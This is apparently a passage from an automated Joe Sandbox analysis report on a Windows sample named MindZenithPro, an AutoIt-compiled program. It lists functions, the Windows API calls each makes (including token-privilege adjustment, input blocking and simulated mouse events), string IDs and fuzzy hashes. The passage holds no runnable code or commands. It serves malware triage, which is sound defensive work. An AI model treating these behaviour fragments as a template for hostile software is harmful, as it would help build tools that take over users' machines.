                                    • API ID: NameUser
                                    • String ID: X64
                                    • API String ID: 2645101109-893830106
                                    • Opcode ID: 0723507cb6a1ae1810f0c1424e5b5d3a28b8e84a0f12e80aebbc6db5618e8d36
                                    • Instruction ID: ea5404878dc3da81d278408acfae4b58941a5bcbefa3cd9efc4803475ee85de3
                                    • Opcode Fuzzy Hash: 0723507cb6a1ae1810f0c1424e5b5d3a28b8e84a0f12e80aebbc6db5618e8d36
                                    • Instruction Fuzzy Hash: 8CD0C9F980512DEACF90CB90EC88DE9777CBB04308F104152F506A2140E73496498B10
                                    Function 004217A1 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                    Download Yara Rule
                                    APIs
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004218DE), ref: 004217B6
                                    • CloseHandle.KERNEL32(?,?,004218DE), ref: 004217CB
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: AdjustCloseHandlePrivilegesToken
                                    • String ID:
                                    • API String ID: 81990902-0
                                    • Opcode ID: 994ecb4757e697f10dc46ecdda28f92c4f303035f679d9408196a0a5f479b995
                                    • Instruction ID: 330857f2614ac0217333d846741c56fb948113333f451a1edd2c33dbc96f1935
                                    • Opcode Fuzzy Hash: 994ecb4757e697f10dc46ecdda28f92c4f303035f679d9408196a0a5f479b995
                                    • Instruction Fuzzy Hash: F9E04F72004760AFE72A2B11FC06E7777E9EF04711B24892DF895844B1DBA2ACD0DB14
                                    Function 0043F229 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • BlockInput.USER32(00000001), ref: 0043F244
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: BlockInput
                                    • String ID:
                                    • API String ID: 3456056419-0
                                    • Opcode ID: 725de388761516aaf7a170f0cdb6faf81a344e878f963a1d9e09ffe703960019
                                    • Instruction ID: 4315fab7b2e8cf8b9f787eb0c195e59601f59b366ef72de7d3ae0fd299c46a2e
                                    • Opcode Fuzzy Hash: 725de388761516aaf7a170f0cdb6faf81a344e878f963a1d9e09ffe703960019
                                    • Instruction Fuzzy Hash: 31E01A362002149FC710AF5AD845E9BB7E8AF98764F10806AF849CB351DAB5EC458B95
                                    Function 0042E9C8 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                    Download Yara Rule
                                    APIs
                                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0042E9F1
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: mouse_event
                                    • String ID:
                                    • API String ID: 2434400541-0
                                    • Opcode ID: ddd26c036288388bc4c7556f43851917f9f5f9485c7ea34198328e0e77dc3437
                                    • Instruction ID: 0ecd913049c0f1e789302dccdb84f3b12c7c01bbe694ccc6435499b9a56f1c3e
                                    • Opcode Fuzzy Hash: ddd26c036288388bc4c7556f43851917f9f5f9485c7ea34198328e0e77dc3437
                                    • Instruction Fuzzy Hash: CDD012F67502203AE86D163AA91FB770604A301741FD8024BB301C5694E0999D81E02D
                                    Function 003E0D25 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00020D31,003E073E), ref: 003E0D2A
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 5e57c86be7ed8b17a8f5153ffea737e17d40aa03402f265b94809d01ca12b9cf
                                    • Instruction ID: 96f8be906e321fc07d4bd5d2e654f4b60bd32626a52b30273a03316b06fe2ca5
                                    • Opcode Fuzzy Hash: 5e57c86be7ed8b17a8f5153ffea737e17d40aa03402f265b94809d01ca12b9cf
                                    • Instruction Fuzzy Hash:
                                    Function 00443265 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 004432B7
                                    • DeleteObject.GDI32(00000000), ref: 004432CA
                                    • DestroyWindow.USER32 ref: 004432D9
                                    • GetDesktopWindow.USER32 ref: 004432F4
                                    • GetWindowRect.USER32(00000000), ref: 004432FB
                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 0044342A
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00443438
                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0044347F
                                    • GetClientRect.USER32(00000000,?), ref: 0044348B
                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 004434C7
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004434E9
                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004434FC
                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00443507
                                    • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00443510
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0044351F
                                    • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00443528
                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0044352F
                                    • GlobalFree.KERNEL32(00000000), ref: 0044353A
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0044354C
                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00460C20,00000000), ref: 00443562
                                    • GlobalFree.KERNEL32(00000000), ref: 00443572
                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00443598
                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 004435B7
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004435D9
                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004437C6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                    • String ID: $AutoIt v3$DISPLAY$static
                                    • API String ID: 2211948467-2373415609
                                    • Opcode ID: 15d9980ffe9af2c3c5889770404706d674d5eb61fc0549016091cd9e9fa9f7c4
                                    • Instruction ID: 99ffa3c65e7f95ffa05bdc174a1e389ff530b818d40dd9ac8a218dd863feeede
                                    • Opcode Fuzzy Hash: 15d9980ffe9af2c3c5889770404706d674d5eb61fc0549016091cd9e9fa9f7c4
                                    • Instruction Fuzzy Hash: 27026D71900214AFDB24DF64CD89EAE7BB9EF48711F108169F915AB2A1CB74EE01CF64
                                    Function 004577A0 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetTextColor.GDI32(?,00000000), ref: 004577FA
                                    • GetSysColorBrush.USER32(0000000F), ref: 0045782B
                                    • GetSysColor.USER32(0000000F), ref: 00457837
                                    • SetBkColor.GDI32(?,000000FF), ref: 00457851
                                    • SelectObject.GDI32(?,?), ref: 00457860
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0045788B
                                    • GetSysColor.USER32(00000010), ref: 00457893
                                    • CreateSolidBrush.GDI32(00000000), ref: 0045789A
                                    • FrameRect.USER32(?,?,00000000), ref: 004578A9
                                    • DeleteObject.GDI32(00000000), ref: 004578B0
                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 004578FB
                                    • FillRect.USER32(?,?,?), ref: 0045792D
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0045794F
                                      • Part of subcall function 00457AB3: GetSysColor.USER32(00000012), ref: 00457AEC
                                      • Part of subcall function 00457AB3: SetTextColor.GDI32(?,?), ref: 00457AF0
                                      • Part of subcall function 00457AB3: GetSysColorBrush.USER32(0000000F), ref: 00457B06
                                      • Part of subcall function 00457AB3: GetSysColor.USER32(0000000F), ref: 00457B11
                                      • Part of subcall function 00457AB3: GetSysColor.USER32(00000011), ref: 00457B2E
                                      • Part of subcall function 00457AB3: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00457B3C
                                      • Part of subcall function 00457AB3: SelectObject.GDI32(?,00000000), ref: 00457B4D
                                      • Part of subcall function 00457AB3: SetBkColor.GDI32(?,00000000), ref: 00457B56
                                      • Part of subcall function 00457AB3: SelectObject.GDI32(?,?), ref: 00457B63
                                      • Part of subcall function 00457AB3: InflateRect.USER32(?,000000FF,000000FF), ref: 00457B82
                                      • Part of subcall function 00457AB3: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00457B99
                                      • Part of subcall function 00457AB3: GetWindowLongW.USER32(00000000,000000F0), ref: 00457BA6
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                    • String ID:
                                    • API String ID: 4124339563-0
                                    • Opcode ID: f8e22aa6a753f5a4f5a919aff60e4d9c94a75698f5c445b8ee4d4af762164145
                                    • Instruction ID: 4988aed55fa0dd39b135d43f95b9dd4867b5cc03c8149e58bce9b11b5fe836a9
                                    • Opcode Fuzzy Hash: f8e22aa6a753f5a4f5a919aff60e4d9c94a75698f5c445b8ee4d4af762164145
                                    • Instruction Fuzzy Hash: 2AA1B071408305BFD7109F64DC48A6FBBA9FF48326F100A39F962961E2E735D948CB56
                                    Function 003D90AA Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DestroyWindow.USER32(?,?), ref: 003D9139
                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0041716B
                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 004171A4
                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004175E9
                                      • Part of subcall function 003D9287: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003D8F0D,?,00000000,?,?,?,?,003D8EDF,00000000,?), ref: 003D92EA
                                    • SendMessageW.USER32(?,00001053), ref: 00417625
                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0041763C
                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00417652
                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 0041765D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                    • String ID: 0
                                    • API String ID: 2760611726-4108050209
                                    • Opcode ID: b0735043e123c8cdbbf60e79030b01d24410494f979e1df3e9be5f6b0e7a9371
                                    • Instruction ID: 34e41d1b8c93b73b04981acd411bad4a77e7249b8c4a55fb46a037c8c2c910c5
                                    • Opcode Fuzzy Hash: b0735043e123c8cdbbf60e79030b01d24410494f979e1df3e9be5f6b0e7a9371
                                    • Instruction Fuzzy Hash: 3612BE31608602AFC726CF14D948BAABBF5FF48310F14456BF4958B761C739E886CB99
                                    Function 00442E98 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DestroyWindow.USER32(00000000), ref: 00442EC5
                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00442FF1
                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00443030
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00443040
                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00443087
                                    • GetClientRect.USER32(00000000,?), ref: 00443093
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 004430DC
                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004430EB
                                    • GetStockObject.GDI32(00000011), ref: 004430FB
                                    • SelectObject.GDI32(00000000,00000000), ref: 004430FF
                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 0044310F
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00443118
                                    • DeleteDC.GDI32(00000000), ref: 00443121
                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0044314D
                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00443164
                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 004431A4
                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 004431B8
                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 004431C9
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 004431FE
                                    • GetStockObject.GDI32(00000011), ref: 00443209
                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00443214
                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 0044321E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                    • API String ID: 2910397461-517079104
                                    • Opcode ID: bb626b4021e4c2ef02d4cea38215913654c92be4438a87baae05d466559bba15
                                    • Instruction ID: 3a064ae3678ea119c7308e8383e4eedfa34ceb2e828877be41665174e8c39067
                                    • Opcode Fuzzy Hash: bb626b4021e4c2ef02d4cea38215913654c92be4438a87baae05d466559bba15
                                    • Instruction Fuzzy Hash: 3FB15C71A00215AFEB24DF64CD46FAE7BB9EB08715F508129F915EB291C7B4ED00CB98
                                    Function 0043524E Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 0043525C
                                    • GetDriveTypeW.KERNEL32(?,0045DB28,?,\\.\,0045DC1C), ref: 00435339
                                    • SetErrorMode.KERNEL32(00000000,0045DB28,?,\\.\,0045DC1C), ref: 004354A5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DriveType
                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                    • API String ID: 2907320926-4222207086
                                    • Opcode ID: 1cd480e2c7bce9bc34ee0e8aafb609213cdcea69d1b8bb717b15dc1dc8205da3
                                    • Instruction ID: 38a33491c96b3428f82598c20515cc6d21664b77707fda15625d80c7e690b278
                                    • Opcode Fuzzy Hash: 1cd480e2c7bce9bc34ee0e8aafb609213cdcea69d1b8bb717b15dc1dc8205da3
                                    • Instruction Fuzzy Hash: 1561A534604A089FC719EB14C991B7DB7A1AF18309F349457E806EB351C779ED82CB4E
                                    Function 00456BE6 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 460windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00456C93
                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00456D4C
                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 00456D68
                                    • GetMenuItemInfoW.USER32(?,00000030,00000000,?), ref: 00456DB9
                                    • SetMenuItemInfoW.USER32(?,00000030,00000000,00000030), ref: 00456E14
                                    • GetMenuItemInfoW.USER32(00000200,00000030,00000000,00000030), ref: 00456E37
                                    • SetMenuDefaultItem.USER32(00000200,?,00000000), ref: 00456E53
                                    • DrawMenuBar.USER32(?), ref: 00456E5F
                                    • SendMessageW.USER32(00000466,00000466,00000000,00000000), ref: 00456EE1
                                    • SendMessageW.USER32(000000F1,000000F1,?,00000000), ref: 0045702F
                                    • SendMessageW.USER32(?,00000401,?,00000000), ref: 00457053
                                    • GetFocus.USER32 ref: 00457059
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,?), ref: 00457114
                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 00457127
                                    • EnableWindow.USER32(00000000,00000000), ref: 0045715E
                                    • EnableWindow.USER32(00000001,00000001), ref: 0045717A
                                    • ShowWindow.USER32(00000010,00000000), ref: 004571F0
                                    • ShowWindow.USER32(?,00000004), ref: 00457206
                                    • EnableWindow.USER32(?,00000001), ref: 0045721F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$Menu$Item$EnableInfo$Show$DefaultDrawFocusMove
                                    • String ID: 0
                                    • API String ID: 1429628313-4108050209
                                    • Opcode ID: 9af651a7f11f879a86e3a344a01153a92004948c6c68decd79b5b7e3a7894210
                                    • Instruction ID: 5892ca6fe72fdc4c1e280bcafe76b2e2e850a7bb8f3e481e93903daae8dca125
                                    • Opcode Fuzzy Hash: 9af651a7f11f879a86e3a344a01153a92004948c6c68decd79b5b7e3a7894210
                                    • Instruction Fuzzy Hash: DF02F370508301AFD721CF24D845BABBBE5FF89356F04852EF994863A2C738D949CB96
                                    Function 00457AB3 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSysColor.USER32(00000012), ref: 00457AEC
                                    • SetTextColor.GDI32(?,?), ref: 00457AF0
                                    • GetSysColorBrush.USER32(0000000F), ref: 00457B06
                                    • GetSysColor.USER32(0000000F), ref: 00457B11
                                    • CreateSolidBrush.GDI32(?), ref: 00457B16
                                    • GetSysColor.USER32(00000011), ref: 00457B2E
                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00457B3C
                                    • SelectObject.GDI32(?,00000000), ref: 00457B4D
                                    • SetBkColor.GDI32(?,00000000), ref: 00457B56
                                    • SelectObject.GDI32(?,?), ref: 00457B63
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00457B82
                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00457B99
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00457BA6
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00457BF5
                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00457C1F
                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00457C3D
                                    • DrawFocusRect.USER32(?,?), ref: 00457C48
                                    • GetSysColor.USER32(00000011), ref: 00457C59
                                    • SetTextColor.GDI32(?,00000000), ref: 00457C61
                                    • DrawTextW.USER32(?,004577C0,000000FF,?,00000000), ref: 00457C73
                                    • SelectObject.GDI32(?,?), ref: 00457C8A
                                    • DeleteObject.GDI32(?), ref: 00457C95
                                    • SelectObject.GDI32(?,?), ref: 00457C9B
                                    • DeleteObject.GDI32(?), ref: 00457CA0
                                    • SetTextColor.GDI32(?,?), ref: 00457CA6
                                    • SetBkColor.GDI32(?,?), ref: 00457CB0
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                    • String ID:
                                    • API String ID: 1996641542-0
                                    • Opcode ID: b524a1bb41abbc43a77c1c35b1e61a3f95934faf4456cf7e940b37bbe203835a
                                    • Instruction ID: 9521e41a5fd2dac0aa8cfbfe8cbd4d1389b92e2f6b40536fdc65923efa86d9bf
                                    • Opcode Fuzzy Hash: b524a1bb41abbc43a77c1c35b1e61a3f95934faf4456cf7e940b37bbe203835a
                                    • Instruction Fuzzy Hash: C8614B72D00218BFDF119FA4DC49EAEBBB9EF08321F104126F915AB2A2D6759940CB94
                                    Function 004517AD Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 004518E2
                                    • GetDesktopWindow.USER32 ref: 004518F7
                                    • GetWindowRect.USER32(00000000), ref: 004518FE
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00451953
                                    • DestroyWindow.USER32(?), ref: 00451973
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 004519A7
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004519C5
                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 004519D7
